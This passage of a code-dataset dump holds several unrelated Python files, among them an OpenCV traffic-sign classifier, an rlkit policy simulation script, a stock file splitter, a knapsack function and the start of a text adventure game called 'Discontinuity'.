d\n","sub_path":"rock/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"46561698","text":"import cv2\nimport sys\nimport numpy as np\nimport random\n\n# Image names\nimages = [\"bumpy_road.jpg\",\n \"dangerous_descendent.jpg\",\n \"exit.jpg\",\n \"freeway_entry.jpg\",\n \"give_way.jpg\",\n \"go_left.jpg\",\n \"go_right.jpg\",\n \"go_straight.jpg\",\n \"local_destination.jpg\",\n \"major_road_sign.jpg\",\n \"no_entry.jpg\",\n \"no_parking.jpg\",\n \"stop_sign.jpg\",\n \"tourist_destination.jpg\",\n \"traffic_light_ahead.jpg\",\n \"speed_limit.jpg\",\n ]\nstage_3_images = [\"bumpy_road.png\",\n \"give_way.png\",\n \"no_parking.png\",\n \"stop.png\",\n \"tourist_destination.png\",\n \"traffic_lights_ahead.png\",\n ]\nstage_4_images = [\"bumpy_road.png\",\n \"circular.png\",\n \"sign.png\",\n \"traffic.png\",\n ]\n\n\nclass Color:\n\n def __init__(self, dom_color=None, clrs=[], clrv=[]):\n self.dominant_color = dom_color\n self.colors = clrs\n self.red = clrv[0]\n self.blue = clrv[1]\n self.green = clrv[2]\n self.yellow = clrv[3]\n self.brown = clrv[4]\n self.white = clrv[5]\n self.black = clrv[6]\n\n\nclass Sign:\n\n def __init__(self, img):\n self.image = cv2.imread(img)\n self.HSV_img = cv2.cvtColor(self.image, cv2.COLOR_BGR2HSV)\n self.grey_img = cv2.imread(img, 0)\n self.h = self.image.shape[0]\n self.w = self.image.shape[1]\n self.area = self.h * self.w\n self.findCnts()\n self.findShape()\n self.findColours()\n self.findSign()\n self.category_determined = False\n self.type_determined = False\n\n def findCnts(self):\n\n # Apply Canny\n self.canned = cv2.Canny(self.grey_img, 150, 150, apertureSize=3)\n\n # Closing structuring element\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n\n # Close the gaps\n self.closed = cv2.morphologyEx(self.canned, cv2.MORPH_CLOSE, kernel)\n\n # Find Contours\n self.contours, self.hierarchy = cv2.findContours(self.closed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n self.removeBorder()\n\n self.removeText()\n\n def removeBorder(self):\n\n # Find the contours from the Canny rather than the closing\n contours, hierarchy = cv2.findContours(self.canned, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n # Initialize the mask\n no_border = np.zeros(self.grey_img.shape, np.uint8)\n\n # Find the borders\n for i, h in enumerate(hierarchy[0]):\n\n cnt = contours[i]\n\n # Find the area of the contour\n area = cv2.contourArea(cnt)\n\n if area == 0 :\n # Create a mask with the border\n mask = np.zeros(self.grey_img.shape, np.uint8)\n cv2.drawContours(mask, [cnt], 0, 255, -1)\n\n # Add the border to the main mask\n no_border = cv2.add(no_border, mask)\n\n if np.array_equiv(no_border, np.zeros(self.grey_img.shape, np.uint8)):\n pass\n\n else:\n # Invert thr mask\n no_border_mask = cv2.bitwise_not(no_border)\n\n # Apply the mask\n no_border_img = cv2.bitwise_and(self.closed, no_border_mask)\n\n # Change the canned\n self.canned = no_border_img\n\n # Closing structuring element\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2, 2))\n\n # Close the gaps\n self.closed = cv2.morphologyEx(self.canned, cv2.MORPH_CLOSE, kernel)\n\n def removeText(self):\n # Define the closing structuring element\n kernel_2 = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))\n\n # ----Stage 1----\n\n\n # Initialize the mask\n no_text = np.zeros(self.grey_img.shape, np.uint8)\n\n # Close the main image\n closed_2 = cv2.morphologyEx(self.canned, cv2.MORPH_CLOSE, kernel_2)\n\n # Find external contours and hierarchy\n contours, hierarchy = cv2.findContours(self.closed, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n hier = hierarchy[0]\n\n # Find the text\n for i, h in enumerate(hier):\n cnt = contours[i]\n if cv2.contourArea(cnt) < 0.15 * self.area:\n # Create a mask with the text\n mask = np.zeros(self.grey_img.shape, np.uint8)\n cv2.drawContours(mask, [cnt], 0, 255, -1)\n # Add to the main mask\n no_text = cv2.add(no_text, mask)\n if np.array_equiv(no_text, np.zeros(self.grey_img.shape, np.uint8)):\n # Use the second closing\n self.closed = closed_2\n\n # Find the contours for the new closed\n self.contours, self.hierarchy = cv2.findContours(self.closed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n else:\n # Invert the msak\n no_text_mask = cv2.bitwise_not(no_text)\n\n # Apply the mask\n no_text_img = cv2.bitwise_and(closed_2, no_text_mask)\n # ----Stage 2----\n\n # Find contours and hierarchy for the new image\n contours, hierarchy = cv2.findContours(no_text_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n hier = hierarchy[0]\n\n # Initialize the mask\n no_text = np.zeros(self.grey_img.shape, np.uint8)\n\n # Find the text\n for i, h in enumerate(hier):\n cnt = contours[i]\n if cv2.contourArea(cnt) < 0.03 * self.area:\n # Create a mask with the text\n mask = np.zeros(self.grey_img.shape, np.uint8)\n cv2.drawContours(mask, [cnt], 0, 255, -1)\n # Add to the main mask\n no_text = cv2.add(no_text, mask)\n # pixelpoints = np.transpose(np.nonzero(mask))\n\n # Invert the mask\n no_text_mask = cv2.bitwise_not(no_text)\n\n # Apply the mask\n no_text_img = cv2.bitwise_and(no_text_img, no_text_mask)\n\n # Use the second closing\n self.closed = no_text_img\n\n # Find the contours for the new closed\n self.contours, self.hierarchy = cv2.findContours(self.closed, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n def findShape(self):\n # Initialise edges value\n self.edges = 0\n\n for i, h in enumerate(self.hierarchy[0]):\n # Assign the contour\n cnt = self.contours[i]\n # Find the outer contour\n if h[3] == -1 and h[2] != -1:\n\n # Approximate the contour\n epsilon_1 = 0.025 * cv2.arcLength(cnt, True)\n approx_1 = cv2.approxPolyDP(cnt, epsilon_1, True)\n self.edges = len(approx_1)\n if self.edges == 8:\n epsilon_2 = 0.01 * cv2.arcLength(cnt, True)\n approx_2 = cv2.approxPolyDP(cnt, epsilon_2, True)\n self.edges = len(approx_2)\n break\n\n if self.edges == 3:\n self.shape = \"Triangle\"\n elif self.edges == 4:\n self.shape = \"Rectangle\"\n elif self.edges == 8:\n self.shape = \"Octagon\"\n elif self.edges > 8:\n self.shape = \"Circle\"\n else:\n self.shape = \"Undetermined\"\n\n def findColours(self):\n\n red = 0\n yellow = 0\n blue = 0\n brown = 0\n green = 0\n white = 0\n black = 0\n colors = []\n dom_clr = \"\"\n for i in range(self.h):\n for j in range(self.w):\n point = self.HSV_img[i][j]\n if point[2] < 30:\n black = black + 1\n elif point[1] < 30:\n white = white + 1\n elif (5 >= point[0] >= 0) or (180 >= point[0] >= 165):\n red = red + 1\n elif 15 >= point[0] >= 5:\n brown = brown + 1\n elif 30 >= point[0] >= 20:\n yellow = yellow + 1\n elif 85 >= point[0] >= 65:\n green = green + 1\n elif 100 >= point[0] >= 90:\n blue = blue + 1\n\n dominant_color = max(red, brown, yellow, green, blue)\n\n if dominant_color == red:\n dom_clr = \"red\"\n elif dominant_color == brown:\n dom_clr = \"brown\"\n elif dominant_color == yellow:\n dom_clr = \"yellow\"\n elif dominant_color == green:\n dom_clr = \"green\"\n elif dominant_color == blue:\n dom_clr = \"blue\"\n else:\n dom_clr = \"not defined\"\n if yellow > 0.01 * self.area:\n colors.append(\"yellow\")\n if blue > 0.02 * self.area:\n colors.append(\"blue\")\n if brown > 0.04 * self.area:\n colors.append(\"brown\")\n if green > 0.01 * self.area:\n colors.append(\"green\")\n if red > 0.23 * self.area:\n colors.append(\"red\")\n if 0.4 * self.area > black > 0.015 * self.area:\n colors.append(\"black\")\n\n clr = Color(dom_clr, colors, [red, blue, green, yellow, brown, white, black])\n self.color = clr\n\n def findSign(self):\n # Based on colors alone\n if 'brown' in self.color.colors:\n self.category = \"Information Sign\"\n self.type = \"Tourist Destination\"\n elif 'yellow' in self.color.colors:\n if 'green' in self.color.colors:\n self.category = \"Warning Sign\"\n self.type = \"Traffic Lights Ahead\"\n else:\n self.category = \"Information Sign\"\n self.type = \"Exit\"\n elif 'green' in self.color.colors:\n self.category = \"Information Sign\"\n self.type = \"Major Road Sign\"\n elif set(['red', 'blue']).issubset(set(self.color.colors)):\n self.category = \"Prohibitory Signs\"\n self.type = \"No Parking\"\n elif self.edges == 3:\n if 'yellow' in self.color.colors:\n self.category = \"Warning Sign\"\n self.type = \"Traffic Lights Ahead\"\n elif 'black' in self.color.colors:\n self.category = \"Warning Sign\"\n self.findTri()\n else:\n self.category = \"Prohibitory Signs\"\n self.type = \"Give Way\"\n elif self.edges == 4:\n self.category = \"Information Sign\"\n\n if 'yellow' in self.color.colors:\n self.type = \"Exit\"\n elif \"blue\" in self.color.colors:\n self.type = \"Freeway Entry\"\n elif \"green\" in self.color.colors:\n self.type = \"Major Road Sign\"\n else:\n self.type = \"Undetermined\"\n elif self.edges == 5:\n self.category = \"Information Sign\"\n if 'brown' in self.color.colors:\n self.type = \"Tourist Destination\"\n else:\n self.type = \"Local Destination\"\n elif self.edges == 8:\n self.category = \"Prohibitory Signs\"\n self.type = \"Stop\"\n elif self.edges > 8:\n if 'red' in self.color.colors:\n self.category = \"Prohibitory Signs\"\n if 'blue' in self.color.colors:\n self.type = \"No Parking\"\n else:\n self.type = \"No Entry\"\n elif 'blue' in self.color.colors:\n self.category = \"Direction Sings\"\n self.findOrientation()\n else:\n self.category = \"Information Signs\"\n self.type = \"End Speed Limit\"\n else:\n self.category = \"Undetermined\"\n self.type = \"Undetermined\"\n\n def findTri(self):\n # Extract hier\n hier = self.hierarchy[0]\n\n for i, h in enumerate(hier):\n if h[0] == -1 and h[2] == -1:\n cnt = self.contours[i]\n epsilon_tri = 0.02 * cv2.arcLength(cnt, True)\n approx_tri = cv2.approxPolyDP(cnt, epsilon_tri, True)\n if len(approx_tri) >= 4:\n self.type = \"Bumpy Road\"\n elif len(approx_tri) == 4:\n self.type = \"Give way\"\n else:\n self.type = \"Dangerous Descendent\"\n\n def findOrientation(self):\n # Extract hier\n hier = self.hierarchy[0]\n\n # Initialize the count\n count = 0\n\n # Find the arrow contour and the arrow count\n for i, h in enumerate(hier):\n if h[0] == -1 and h[1] == -1 and h[2] == -1:\n cnt = self.contours[i]\n if cv2.arcLength(cnt, True) > 200:\n\n self.arrow_cnt = self.contours[i]\n count = count+1\n\n if count > 1:\n self.type = \"Circular\"\n else :\n # Assigning initial values\n right = 0\n left = 0\n cnt = self.arrow_cnt\n (x, y), (MA, ma), angle = cv2.fitEllipse(cnt)\n print(angle)\n\n if angle > 120 :\n self.type = \"Go Straight\"\n return\n\n # Find the approximation\n epsilon = 0.02 * cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, epsilon, True)\n # Determine whether the contour is on the left of the right\n for apx in approx:\n if apx[0][0] < ((self.w / 2) - 15):\n left = left + 1\n elif apx[0][0] > ((self.w / 2) + 15):\n right = right + 1\n if left > right:\n self.type = \"Go Left\"\n else:\n self.type = \"Go Right\"\n return\n\n\n\ndef stage1_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in images:\n img = \"stage_1\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_1\\\\\" + sign + \".jpg\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\ndef stage2_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in images:\n img = \"stage_2\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_2\\\\\" + sign + \".jpg\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\ndef stage3_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in stage_3_images:\n img = \"stage_3\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_3\\\\\" + sign + \".png\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\ndef stage4_images(sign = \"all\",show = True):\n if sign == \"all\":\n for im in stage_4_images:\n img = \"stage_4\\\\\"+im\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\",sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n else:\n img = \"stage_4\\\\\" + sign + \".png\"\n sign = Sign(img)\n if show == True:\n cv2.imshow(\"original\", sign.image)\n cv2.waitKey()\n print(sign.category)\n print(sign.type)\n\n\n\n","sub_path":"testing/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":16117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"357365075","text":"from rlkit.envs.remote import RemoteRolloutEnv\nfrom rlkit.misc import eval_util\nfrom rlkit.samplers.rollout_functions import rollout\nfrom rlkit.torch.core import PyTorchModule\nimport rlkit.torch.pytorch_util as ptu\nimport argparse\nimport pickle\nimport uuid\nfrom rlkit.core import logger\n\nfilename = str(uuid.uuid4())\n\nfrom rlkit.torch.sac.policies import TanhGaussianPolicy,GaussianPolicy, MakeDeterministic\n\ndef simulate_policy(args):\n data = pickle.load(open(args.file, \"rb\"))\n policy_key = args.policy_type+'/policy'\n if policy_key in data:\n policy = data[policy_key]\n else:\n raise Exception(\"No policy found in loaded dict. Keys: {}\".format(\n data.keys()\n ))\n\n env_key = args.env_type + '/env'\n if env_key in data:\n env = data[env_key]\n else:\n raise Exception(\"No environment found in loaded dict. Keys: {}\".format(\n data.keys()\n ))\n\n if isinstance(env, RemoteRolloutEnv):\n env = env._wrapped_env\n print(\"Policy loaded\")\n\n if args.enable_render:\n # some environments need to be reconfigured for visualization\n env.enable_render()\n if args.gpu:\n ptu.set_gpu_mode(True)\n if hasattr(policy, \"to\"):\n policy.to(ptu.device)\n if hasattr(env, \"vae\"):\n env.vae.to(ptu.device)\n\n if args.deterministic:\n policy = MakeDeterministic(policy)\n\n if args.pause:\n import ipdb; ipdb.set_trace()\n if isinstance(policy, PyTorchModule):\n policy.train(False)\n paths = []\n while True:\n paths.append(rollout(\n env,\n policy,\n max_path_length=args.H,\n render=not args.hide,\n ))\n if args.log_diagnostics:\n if hasattr(env, \"log_diagnostics\"):\n env.log_diagnostics(paths, logger)\n for k, v in eval_util.get_generic_path_information(paths).items():\n logger.record_tabular(k, v)\n logger.dump_tabular()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('file', type=str,\n help='path to the snapshot file')\n parser.add_argument('--H', type=int, default=100,\n help='Max length of rollout')\n parser.add_argument('--speedup', type=float, default=10,\n help='Speedup')\n parser.add_argument('--policy_type', type=str, default='evaluation')\n parser.add_argument('--env_type', type=str, default='evaluation')\n parser.add_argument('--gpu', action='store_true')\n parser.add_argument('--pause', action='store_true')\n parser.add_argument('--deterministic', action='store_true')\n parser.add_argument('--hide', action='store_true')\n parser.add_argument('--enable_render', action='store_true')\n parser.add_argument('--log_diagnostics', action='store_true')\n parser.add_argument('--gaussian_policy', action='store_true')\n args = parser.parse_args()\n import ipdb; ipdb.set_trace()\n simulate_policy(args)\n","sub_path":"scripts/sim_policy.py","file_name":"sim_policy.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"490946528","text":"def getArchivoCompleto():\n try:\n archivo = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\stock.txt\",\"rt\")\n salidaCompras = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\salidaCompras.txt\",\"wt\")\n salidaVentas = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\salidaVentas.txt\",\"wt\")\n for linea in archivo:\n try:\n # si el if es true es un registro de ventas\n if(int(linea[11:14])):\n salidaVentas.write(linea)\n # si entra en la excepcion es porque es un registro de compras\n except ValueError:\n salidaCompras.write(linea)\n except IOError:\n print(\"Imposible abrir el archivo\")\n finally:\n archivo.close()\n salidaCompras.close()\n salidaCompras.close()\n\n\ndef salidaCompras():\n lista = []\n try:\n archivo = open(\"C:\\\\repos\\\\UADE\\\\Programacion-I\\\\Final-Previo\\\\salidaCompras.txt\",\"rt\")\n # hasta -1 para quitar el salto de linea\n for linea in archivo:\n lista.append(linea[:-1])\n except IOError:\n print(\"Imposible abrir el archivo de compras\")\n finally:\n archivo.close()\n return lista\n\n\nif __name__ == \"__main__\":\n getArchivoCompleto()\n listaCompras = salidaCompras()\n print(listaCompras)","sub_path":"Programacion-I/Final-Previo/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"409301661","text":"def knapsack(n, C, memo):\n if (n, C) in memo:\n return memo[(n, C)]\n\n if n == 0 or C == 0:\n result = 0\n elif w[n] > C:\n result = knapsack(n - 1, C, memo)\n else:\n #not put the item in knapsack\n tmp1 = knapsack(n - 1, C, memo)\n\n #put the item in knapsack\n tmp2 = v[n] + knapsack(n - 1, C - w[n], memo)\n result = max(tmp1, tmp2)\n\n memo[(n, C)] = result\n return result\n","sub_path":"knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"455104468","text":"import numpy as np\n\n\ndef normalize(A):\n sum = np.sum(A, 0)\n V = A.shape[0]\n D = np.zeros((V, V))\n for i in range(V):\n if sum[i] > 0:\n D[i, i] = 1.0 / sum[i]\n return np.dot(A, D)\n\ndef main():\n H = 16\n W = 8\n V = H * W\n len_t = 24 * (31 + 31 + 30)\n K = 9\n label = np.load('../poi/regular_label_.npy')\n label = np.tile(label, (V, 1)).transpose()\n adj_mat = np.load('path_bike_nyc_regular.npy')\n\n sum = np.zeros((24 * 2, V, V), dtype=np.float32)\n A = np.zeros((24 * 2, V, V, K + 1), dtype=np.float32)\n eye = np.eye(V)\n neg_eye = 1 - eye\n holiday = [i for i in range(1, 93, 7)] + [i for i in range(2, 93, 7)] + [4, 66]\n for day in holiday:\n sum[24:48, :, :] += adj_mat[(day - 1) * 24: day * 24, :, :]\n for t in range(24):\n sum[t, :, :] = np.sum(adj_mat[t:len_t:24, :, :], axis=0) - sum[24 + t, :, :]\n adjacency = sum[t, :, :]\n normalized_adjacency = normalize(adjacency.transpose() * neg_eye)\n A[t, :, :, 0] = eye\n for k in range(K):\n A[t, :, :, 1 + k][label == k] = normalized_adjacency[label == k]\n for t in range(24, 48):\n adjacency = sum[t, :, :]\n normalized_adjacency = normalize(adjacency.transpose() * neg_eye)\n A[t, :, :, 0] = eye\n for k in range(K):\n A[t, :, :, 1 + k][label == k] = normalized_adjacency[label == k]\n np.save('regular_path.npy', A)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"path/path_regular.py","file_name":"path_regular.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"314060641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n__author__ = 'City10th'\n'变量相关'\n\nimport os,sys\n\n\n# 特定app的路径类\nclass apppath(object):\n def __init__(self, special_app='try_auto'):\n # cityapps路径\n self.cityapps = os.environ['cityappsHOME']\n\n # 如果用户未指定app,则尝试识别当前脚本所在的app\n if special_app=='try_auto':\n p1 = os.path.split(os.path.abspath(sys.argv[0]))[0] # 获取当前脚本所在的绝对位置\n p2 = os.path.relpath(p1, self.cityapps) # 从 p1中删掉cityapps 路径\n #p2 = p1.split(len(self.cityapps)) # 从 p1中删掉cityapps 路径\n special_app = p2.split(os.path.sep)[1]\n if os.path.join(self.cityapps, 'apps', os.path.sep.join(p2.split(os.path.sep)[1:])) != p1:\n print('@!@ 错误:自动获取当前app失败')\n sys.exit(0)\n elif special_app not in os.listdir(os.path.join(self.cityapps,'apps')):\n print('@!@ 错误:不存在此app')\n \n # app的名称\n self.appname = special_app\n # app的路径\n self.app = os.path.join(self.cityapps, 'apps', special_app)\n # app模块目录\n self.module = os.path.join(self.cityapps, 'apps', special_app, 'module')\n # app主脚本目录\n self.main = os.path.join(self.cityapps, 'apps', special_app, 'main')\n\n","sub_path":"lib/city_py_mo/var.py","file_name":"var.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"211586008","text":"'''\nTitle: Discontinuity\nAuthor: Haamid Mohammed\nDate Created: 2018/09/21\n'''\nimport sys\nimport random\nimport time\n\nplay = True\nstart = 0\nlocation = \"spawn\"\npick2 = 0\npick3 = 0\npick4 = 0\npick5 = 0\ntime1 = 10\nchoice1 = 0\nchoice2 = 0\nchoice3 = 0\nchoice4 = 0\nchoice5 = 0\nchoice6 = 0\nchoice7 = 0\nchoice6 = 0\nchoice9 = 0\nchoice10 = 0\nchoice11 = 0\nchoice12 = 0\nchoice13 = 0\nchoice14 = 0\ns1 = 0\npower = 0\n\t\n\n\ndef ps(str): # Subroutine to Print Slowly\n\tfor x in str:\n\t\t\tsys.stdout.write(x)\n\t\t\tsys.stdout.flush()\n\t\t\ttime.sleep(0.01)\n\tprint(\"\") \n\ndef intro(): # The Intro\n\tglobal start\n\tprint(\"\"\"\n __ __ __ __ ___ ___ \n| \\\\ | /__` / ` / \\\\ |\\\\ | | | |\\\\ | | | | | \\\\ / \n|__/ | .__/ \\\\__, \\\\__/ | \\\\| | | | \\\\| \\\\__/ | | | \n\n\"\"\")\n\tprint(\"This game is a choose you own adventure.\")\n\tprint(\"You have to make many different choices and your outcome will change depending on the choices you make.\")\n\tprint(\"There are many ways to play the game but there are good outcomes as well as bad ones\")\n\tprint(\"Lets see how you play the game.\")\n\t\n\twhile not start == \"\":\n\t\tstart = input(\"Press enter to begin\")\n\t\n\ndef R1(): # Location 1, Where you begin\n\tglobal location\n\tglobal time1\n\tglobal s1\n\t\n\n\tif s1 == 0:\n\t\tps(\"You wake up and u see a spear next to you, and you hear a voice, it says, 'Complete the sword and beat the boss before time runs out'.\")\n\t\tps(\"You don't know what that means, so you look around.\")\n\t\tps(\"You see a forest and an open field in front of you, in the open field you see some creatures that you have never seen before and behind you there is a mountain that is too tall and steep to climb.\")\n\t\ts1 = 1\n\tps(\"Now you have to make a choice, go to the forest, go to the open field, or try to climb the mountain.\")\n\t\n\n\twhile location == \"spawn\":\n\t\tchoice1 = input(\"Forest, open field, or mountain: \")\n\t\t\n\n\t\tif choice1 == \"Forest\" or choice1 == \"forest\":\n\t\t\tlocation = \"forest\"\n\t\t\n\n\t\telif choice1 == \"Mountain\" or choice1 == \"mountain\":\n\t\t\tps(\"You tried to climb the mountain but failed to even get quarter of the way and because of that you wasted time\")\n\t\t\t#ps(\"Now you have wasted time climbing the mountain where do you want to go, the forest or the open field\")\n\t\t\ttime1 -= 1\n\t\t\n\n\t\telif choice1 == \"open field\" or choice1 == \"Open Field\" or choice1 == \"open Field\" or choice1 == \"Open field\" or choice1 == \"field\" or choice1 == \"Field\":\n\t\t\tlocation = \"plains\"\n\t\n \n\n\ndef R2(): # Location 2, The forest\n\tglobal pick2\n\tglobal location\n\tglobal time1\n\tglobal pick3\n\tps(\"The forest is heavily dense so you cant see the sky from the bottom and there seem to be some type of bioluminescent flowers around to light up the forest\")\n\t\n\n\tif pick2 == 0:\n\t\tps(\"You look around the forest and see a peculear tree and you examine it, the tree has many fruit but only some seem to be ripe.\")\n\t\tps(\"You don't know if the fruit is poisonous or not\")\n\t\tchoice2 = input(\"Do you want to pick the fruit, (there are 3 that seem ripe) (Y/N): \")\n\t\n\n\t\tif choice2 == \"Y\" or choice2 == \"y\":\n\t\t\tps(\"You hear a voice again, it says, 'This is a medicinal fruit, it will heal you in battle'\")\n\t\t\tps(\"You put the fruit in you pocket and go deeper into the forest\")\n\t\t\tpick2 = 1\n\t\n\n\t\telse:\n\t\t\tps(\"You leave the fruit and go deeper into the forest\")\n\t\t\tpick2 = 0\n\t\n\n\tif pick3 == 0:\n\t\tps(\"You see a large tree and you think it will be a good idea to climb it to get a better view.\")\n\t\tchoice3 = input(\"Do you wish to climb it? (Y/N): \")\n\t\t\n\n\t\tif choice3 == \"Y\" or choice3 == \"y\":\n\t\t\tps(\"You climbed the tree\")\n\t\t\tps(\"You see a castle, the open field, the mountains, and the strange sun.\")\n\t\t\tps(\"There only seems to be only a portion of the sun left, it's like someone cut a pizza slice out of the sun.\")\n\t\t\tps(\"You don't know what will happen when the sun dissapears so you now have to make a choice\")\n\t\t\tps(\"You climb down the tree and now you have to think about where to go.\")\n\t\t\tps(\"Go back to where you began, go to the open field, or to the castle\")\n\t\t\tpick3 = 1\n\t\t\n\n\t\t\twhile location == \"forest\":\n\t\t\t\tchoice4 = input(\"Go back, open field, or the castle: \")\n\t\t\n\n\t\t\t\tif choice4 == \"castle\" or choice4 == \"Castle\" or choice4 == \"The Castle\" or choice4 == \"the castle\" or choice4 == \"The castle\" or choice4 == \"the Castle\":\n\t\t\t\t\tlocation = \"castleout\"\n\t\t\n\n\t\t\t\telif choice4 == \"Go Back\" or choice4 == \"go back\" or choice4 == \"back\" or choice4 == \"Back\":\n\t\t\t\t\tlocation = \"spawn\"\n\t\t\n\n\t\t\t\telif choice4 == \"open field\" or choice4 == \"Open Field\" or choice4 == \"open Field\" or choice4 == \"Open field\" or choice4 == \"field\" or choice4 == \"Field\":\n\t\t\t\t\tlocation = \"plains\"\n\t\t\t\n\t\t\n\t\telse:\n\t\t\tps(\"You dont know where to go now since the forest seems to never end.\")\n\t\t\tps(\"Do you want to go back, keep going deeper into the forest or go to the open field\")\n\t\t\tpick3 = 0\n\t\t\t\n\t\t\twhile location == \"forest\":\n\t\t\t\tchoice4 = input(\"Go back, forest, or open field: \")\n\t\t\t\t\n\n\t\t\t\tif choice4 == \"forest\" or choice4 == \"Forest\" :\n\t\t\t\t\tps(\"You go deeper into the forest and you seem to have left from the other side of the forest.\")\n\t\t\t\t\tlocation = \"castleout\"\n\t\t\t\t\n\n\t\t\t\telif choice4 == \"Go Back\" or choice4 == \"go back\" or choice4 == \"back\" or choice4 == \"Back\":\n\t\t\t\t\tlocation = \"spawn\"\n\t\t\t\t\n\n\t\t\t\telif choice4 == \"open field\" or choice4 == \"Open Field\" or choice4 == \"open Field\" or choice4 == \"Open field\" or choice4 == \"field\" or choice4 == \"Field\":\n\t\t\t\t\tlocation = \"plains\"\n\t\t\t\n\telse:\n\t\tps(\"Go back to where you began, go to the open field, or to the castle\")\n\t\t\n\t\twhile location == \"forest\":\n\t\t\tchoice4 = input(\"Go back, the castle, or open field: \")\n\n\n\t\t\tif choice4 == \"forest\" or choice4 == \"Forest\" :\n\t\t\t\tps(\"You go deeper into the forest and you seem to have left from the other side of the forest.\")\n\t\t\t\tlocation = \"castleout\"\n\t\t\t\n\n\t\t\telif choice4 == \"Go Back\" or choice4 == \"go back\" or choice4 == \"back\" or choice4 == \"Back\":\n\t\t\t\tlocation = \"spawn\"\n\t\t\t\n\n\t\t\telif choice4 == \"open field\" or choice4 == \"Open Field\" or choice4 == \"open Field\" or choice4 == \"Open field\" or choice4 == \"field\" or choice4 == \"Field\":\n\t\t\t\tlocation = \"plains\"\n\n\n\t\n\ndef R3(): # Location 3, The plains\n\tglobal location\n\tglobal time1\n\tglobal power\n\tglobal start\n\tglobal pick5\n\tif pick5 == 0:\n\t\tps(\"You are at the open field and you see some creatures, you dont know if they are hostile or not.\")\n\t\tps(\"Do you attack them (You have the spear), approach to talk to them, or go to one of the places you have discovered\")\n\t\tchoice5 = input(\"attack, talk or leave: \")\n\n\n\t\tif choice5 == \"attack\" or choice5 == \"attack them\":\n\t\t\tps(\"You attacked them without holding anything back.\")\n\t\t\tps(\"You kill the creatures and some sort of power flows into you empowering you\")\n\t\t\tps(\"You try to summon this new power and you think that having a sword would be nice.\")\n\t\t\tps(\"A sword suddenly appears in your hand, the sword has no weight but it is sharper than any sword you have used before.\")\n\t\t\tps(\"You think of it becoming a bow and it slowly chapes into a bow.\")\n\t\t\tps(\"You think this is a great power to have and it will be useful in the future if you have to fight anything else.\")\n\t\t\tpower = 1\n\t\t\tvariable = 1\n\t\t\tpick5 = 1\n\n\n\t\telif choice5 == \"talk\" or choice5 == \"Talk\":\n\t\t\tps(\"They attack you, do you want to run away or fight them?\")\n\t\t\tchoice6 = input(\"Run or Fight: \")\n\t\t\n\n\t\t\tif choice6 == \"fight\" or choice6 == \"Fight\":\n\t\t\t\tps(\"You attacked them without holding anything back.\")\n\t\t\t\tps(\"You kill the creatures and some sort of power flows into you empowering you\")\n\t\t\t\tps(\"You try to summon this new power and you think that having a sword would be nice.\")\n\t\t\t\tps(\"A sword suddenly appears in your hand, the sword has no weight but it is sharper than any sword you have used before.\")\n\t\t\t\tps(\"You think of it becoming a bow and it slowly chapes into a bow.\")\n\t\t\t\tps(\"You think this is a great power to have and it will be useful in the future if you have to fight anything else.\")\n\t\t\t\tpower = 1\n\t\t\t\tvariable = 1\n\t\t\t\tpick5 = 1\n\n\n\t\t\telif choice6 == \"Run\" or choice6 == 